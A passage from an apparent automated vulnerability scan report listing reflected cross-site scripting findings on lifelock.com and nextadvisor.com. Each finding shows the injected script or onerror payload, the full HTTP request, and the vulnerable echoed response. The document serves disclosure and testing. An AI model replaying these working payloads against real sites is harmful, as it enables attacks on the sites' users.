The value of the promocodehide request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e556"><script>alert(1)</script>7f71559fd29 was submitted in the promocodehide parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:18 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; path=/
Set-Cookie: TSceba2f=5aaeac0c062f3d8d72230cba15c93f6fb9ed150244c2657c4db4188e; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29" class="enroll-now">
...[SNIP]...

5.49. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6492a"><script>alert(1)</script>31358a97f04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6492a"><script>alert(1)</script>31358a97f04 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/favicon.ico6492a"><script>alert(1)</script>31358a97f04" />
...[SNIP]...

5.50. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f416"><script>alert(1)</script>4731f60ad3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=bb25406075fc65fe23fc9018b416cc04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg.php" />
...[SNIP]...

5.51. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89eaf"><script>alert(1)</script>c76e2d7db84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=4188008f9f9154f752a18764b6f09d95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg.php" />
...[SNIP]...

5.52. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7 was submitted in the REST URL parameter 2. This input was echoed as 8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:13:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=80851d8767d529f822b1adcb94be86b8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7/index.php' class='nav_select'>
...[SNIP]...

5.53. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d368"><script>alert(1)</script>a121883116c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=9b2c0adab769e7435ca716e85fa328da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c.php" />
...[SNIP]...

5.54. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312bd"><script>alert(1)</script>b453ad10c5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:16 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=0b2d5ef5edf6176ddbb7555b33b8cff1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg.php" />
...[SNIP]...

5.55. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79021"><script>alert(1)</script>982aa0608fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e3ec558f338fee4db7b551cf98449cb9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg.php" />
...[SNIP]...

5.56. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22 was submitted in the REST URL parameter 2. This input was echoed as 6b593'><img src=a onerror=alert(1)>2fa20870a22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=77f89f3390f07771db738fe244d7fef1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar6b593'><img src=a onerror=alert(1)>2fa20870a22/index.php' class='nav_select'>
...[SNIP]...

5.57. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c41a"><script>alert(1)</script>349ece8baa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=c9c4f40a3f3a57bfe5676297eebc1e47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg6c41a"><script>alert(1)</script>349ece8baa9.php" />
...[SNIP]...

5.58. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 793b4"><script>alert(1)</script>a2d9ab8e691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:11 GMT
